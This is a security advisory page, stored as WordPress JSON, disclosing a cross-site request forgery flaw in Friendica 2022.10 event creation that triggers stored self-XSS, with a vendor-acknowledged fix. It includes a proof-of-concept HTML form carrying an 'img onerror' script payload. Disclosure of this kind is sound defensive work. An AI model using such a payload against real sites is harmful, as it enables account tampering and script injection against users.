{"id":19739,"date":"2023-03-23T12:20:00","date_gmt":"2023-03-23T11:20:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19739"},"modified":"2023-03-24T13:37:49","modified_gmt":"2023-03-24T12:37:49","slug":"usd-2022-0049","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0049\/","title":{"rendered":"usd-2022-0049"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0049 | Friendica 2022.10 - Cross-Site Request Forgery (CSRF)<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2022-0049
\nProduct<\/strong>: Friendica<\/span>
\nAffected Version<\/strong>: 2022.10<\/span>
\nVulnerability Type<\/strong>: Cross-Site Request Forgery (CSRF) (CWE-352)<\/span>
\nSecurity Risk<\/strong>: High<\/span>
\nVendor URL<\/strong>: https:\/\/friendi.ca\/<\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status:\u00a0<\/strong>Fixed<\/p>\n

Description<\/h3>\n

The open source application Friendica is used to set up a decentralized social network. The focus lies on effective privacy settings and interoperability with third-party services.
\nA CSRF vulnerability was identified during the creation of new events in friendica. This CSRF vulnerability can be used to trigger a self-xss vulnerability in the event name.<\/span><\/p>\n

Proof of Concept<\/h3>\n

A malicous website can be created using the following snippet. Visiting the website will create a new event in their calendar containing JavaScript payload:<\/span><\/p>\n

\n
<html>\n  <body>\n  <script>history.pushState('', '', '\/')<\/script>\n    <form action=\"[http:\/\/localhost\/events\"]() method=\"POST\">\n      <input type=\"hidden\" name=\"event_id\" value=\"0\" \/>\n      <input type=\"hidden\" name=\"cid\" value=\"0\" \/>\n      <input type=\"hidden\" name=\"uri\" value=\"http:\/\/localhost\/objects\/61ef0ae2-2163-6a90-40be-1a7639377312\" \/>\n      <input type=\"hidden\" name=\"preview\" value=\"0\" \/>\n      <input type=\"hidden\" name=\"summary\" value=\"&lt;img src=\/X onerror=alert(document.domain)&gt;\" \/>\n      <input type=\"hidden\" name=\"start_text\" value=\"2022-11-08 18:46\" \/>\n      <input type=\"hidden\" name=\"finish_text\" value=\"2022-11-08 18:46\" \/>\n      <input type=\"hidden\" name=\"nofinish\" value=\"0\" \/>\n      <input type=\"hidden\" name=\"share\" value=\"0\" \/>\n      <input type=\"hidden\" name=\"submit\" value=\"Submit\" \/>\n      <input type=\"hidden\" name=\"desc\" value=\"\" \/>\n      <input type=\"hidden\" name=\"location\" value=\"\" \/>\n      <input type=\"hidden\" name=\"visibility\" value=\"public\" \/>\n      <input type=\"submit\" value=\"Submit request\" \/>\n    <\/form>\n  <\/body>\n<\/html>\n<\/code><\/pre>\n<\/div>\n
<\/h3>\n
If the victim visits their calendar, the secretly injected event will be executed in the context of the application:<\/span><\/span><\/p>\n
\"\"<\/h3>\n
Fix<\/h3>\n
Add CSRF tokens to all state changing requests (requests that cause actions on the site) and validate them on the backend.<\/p>\n
References<\/h3>\n